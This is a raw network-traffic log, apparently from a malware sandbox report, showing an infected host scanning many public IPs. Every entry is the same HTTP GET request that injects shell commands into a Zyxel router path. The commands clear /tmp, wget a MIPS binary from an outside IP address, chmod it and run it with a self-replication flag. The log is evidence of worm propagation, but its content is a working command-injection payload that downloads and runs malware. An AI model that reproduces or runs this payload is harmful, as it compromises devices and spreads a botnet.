                                          Jan 14, 2024 15:46:31.332289934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7998192.168.2.2339850112.131.27.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332331896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7999192.168.2.2339218140.83.236.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332360983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8000192.168.2.2346536223.240.242.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332397938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8001192.168.2.23516709.203.53.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332427979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8002192.168.2.2340650164.83.74.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332456112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8003192.168.2.2352290178.220.123.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332484961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8004192.168.2.2334390170.245.188.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332509995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8005192.168.2.234437272.100.122.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332551956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8006192.168.2.2333826152.146.96.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332575083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8007192.168.2.233392064.241.25.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332597971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8008192.168.2.235916076.160.140.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332614899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8009192.168.2.2347182142.55.118.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332663059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8010192.168.2.235011460.26.120.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332674026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8011192.168.2.233918492.206.40.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332684040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8012192.168.2.235466824.150.65.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332725048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8013192.168.2.2345138161.145.149.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332779884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8014192.168.2.234182025.142.227.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332806110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8015192.168.2.23355901.54.49.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332820892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8016192.168.2.2350444165.8.233.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332863092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8017192.168.2.2342718192.141.225.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332870007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8018192.168.2.235240268.79.97.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332925081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8019192.168.2.2359998133.163.23.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332942963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8020192.168.2.2357350187.72.205.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332963943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8021192.168.2.234555844.25.12.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332993984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8022192.168.2.235749296.167.174.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333030939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8023192.168.2.2359804130.110.245.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333061934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8024192.168.2.2341478166.218.106.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333093882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8025192.168.2.2334678203.51.164.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333142042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8026192.168.2.2354740192.5.164.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333158970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8027192.168.2.23528928.204.180.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333158970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8028192.168.2.234150864.251.162.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333199024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8029192.168.2.2353646195.16.185.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333235979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8030192.168.2.2348094170.51.132.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333264112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8031192.168.2.233950634.103.200.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333276987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8032192.168.2.2340966223.97.74.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333323002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8033192.168.2.2337964131.60.230.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333340883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8034192.168.2.2342224149.21.141.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333349943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8035192.168.2.234022462.190.171.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333400011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8036192.168.2.2337960111.16.25.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333431959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8037192.168.2.2356504123.81.206.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333453894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8038192.168.2.2341674108.108.204.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333481073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8039192.168.2.235210654.122.209.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333496094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8040192.168.2.2359284111.168.85.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333539009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8041192.168.2.2335012106.209.39.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333559990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8042192.168.2.236080067.126.118.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333596945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8043192.168.2.233369485.135.100.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333606958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8044192.168.2.234277868.147.112.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333637953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8045192.168.2.2357218142.47.224.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333673000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8046192.168.2.2344288125.230.216.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333725929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8047192.168.2.2356118105.41.170.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333755970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8048192.168.2.2357696106.120.173.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333765984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8049192.168.2.2351616140.189.47.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333800077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8050192.168.2.234756445.138.148.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333825111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8051192.168.2.2350484156.133.120.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333848000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8052192.168.2.2346556222.80.132.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333884001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8053192.168.2.2338082177.43.249.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333921909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8054192.168.2.233801265.1.120.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333929062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8055192.168.2.234662450.75.196.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333945036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8056192.168.2.2360352105.114.87.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333972931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8057192.168.2.2352762168.200.149.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.333988905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8058192.168.2.2356064193.129.251.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334028959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8059192.168.2.2347430140.222.154.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334053040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8060192.168.2.2334294153.183.191.127443
                                          TimestampBytes transferredDirectionData
